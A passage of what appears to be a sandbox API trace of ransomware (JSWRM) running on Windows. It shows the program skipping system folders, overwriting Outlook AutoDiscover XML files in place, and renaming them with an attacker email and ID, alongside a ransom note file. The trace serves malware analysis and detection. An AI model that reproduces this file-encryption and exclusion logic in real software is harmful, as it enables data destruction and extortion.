(lpString1="BTOPENWORLD.COM.XML", lpString2="documents and settings") returned -1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="system volume information") returned -1 [0137.815] lstrcmpiW (lpString1="BTOPENWORLD.COM.XML", lpString2="msocache") returned -1 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTOPENWORLD.COM.XML", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTOPENWORLD.COM.XML", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTOPENWORLD.COM.XML", lpUsedDefaultChar=0x0) returned 19 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTOPENWORLD.COM.XML", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BTOPENWORLD.COM.XML", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BTOPENWORLD.COM.XML", lpUsedDefaultChar=0x0) returned 19 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btopenworld.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.816] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=807) returned 1 [0137.816] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.816] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.818] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.818] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.818] CloseHandle (hObject=0x238) returned 1 [0137.818] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btopenworld.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\btopenworld.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.819] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c91d744, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c91d744, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c91d744, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x328, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLASH.NET.XML", cAlternateFileName="FLASHN~1.XML")) returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2=".") returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="..") returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="...") returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="windows") returned -1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="recovery") returned -1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="perflogs") returned -1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="documents and settings") returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="system volume information") returned -1 [0137.819] lstrcmpiW (lpString1="FLASH.NET.XML", lpString2="msocache") returned -1 [0137.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLASH.NET.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLASH.NET.XML", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLASH.NET.XML", lpUsedDefaultChar=0x0) returned 13 [0137.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLASH.NET.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLASH.NET.XML", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLASH.NET.XML", lpUsedDefaultChar=0x0) returned 13 [0137.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\FLASH.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\flash.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.820] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=808) returned 1 [0137.820] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.820] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.822] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.822] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.822] CloseHandle (hObject=0x238) returned 1 [0137.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\FLASH.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\flash.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\FLASH.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\flash.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.823] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="GMAIL.COM.XML", cAlternateFileName="GMAILC~1.XML")) returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2=".") returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="..") returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="...") returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="windows") returned -1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="recovery") returned -1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="perflogs") returned -1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="documents and settings") returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="system volume information") returned -1 [0137.823] lstrcmpiW (lpString1="GMAIL.COM.XML", lpString2="msocache") returned -1 [0137.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMAIL.COM.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMAIL.COM.XML", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMAIL.COM.XML", lpUsedDefaultChar=0x0) returned 13 [0137.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMAIL.COM.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMAIL.COM.XML", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMAIL.COM.XML", lpUsedDefaultChar=0x0) returned 13 [0137.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\GMAIL.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\gmail.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.835] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.835] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.835] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.837] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.837] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.837] CloseHandle (hObject=0x238) returned 1 [0137.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\GMAIL.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\gmail.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\GMAIL.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\gmail.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.838] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48cd1bb1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48cd1bb1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48cd1bb1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0137.838] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0137.839] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0137.839] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NL.ROGERS.COM.XML", cAlternateFileName="NLROGE~1.XML")) returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2=".") returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="..") returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="...") returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="windows") returned -1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="recovery") returned -1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="perflogs") returned -1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="documents and settings") returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="system volume information") returned -1 [0137.839] lstrcmpiW (lpString1="NL.ROGERS.COM.XML", lpString2="msocache") returned 1 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL.ROGERS.COM.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL.ROGERS.COM.XML", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL.ROGERS.COM.XML", lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL.ROGERS.COM.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL.ROGERS.COM.XML", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL.ROGERS.COM.XML", lpUsedDefaultChar=0x0) returned 17 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\NL.ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nl.rogers.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.840] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=818) returned 1 [0137.840] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.840] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0137.841] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.842] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0137.842] CloseHandle (hObject=0x238) returned 1 [0137.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\NL.ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nl.rogers.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\NL.ROGERS.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nl.rogers.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.843] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NVBELL.NET.XML", cAlternateFileName="NVBELL~1.XML")) returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2=".") returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="..") returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="...") returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="windows") returned -1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="recovery") returned -1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="perflogs") returned -1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="documents and settings") returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="system volume information") returned -1 [0137.843] lstrcmpiW (lpString1="NVBELL.NET.XML", lpString2="msocache") returned 1 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NVBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NVBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NVBELL.NET.XML", lpUsedDefaultChar=0x0) returned 14 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NVBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NVBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NVBELL.NET.XML", lpUsedDefaultChar=0x0) returned 14 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\NVBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nvbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.844] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.844] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.845] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.846] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.846] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.846] CloseHandle (hObject=0x238) returned 1 [0137.846] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 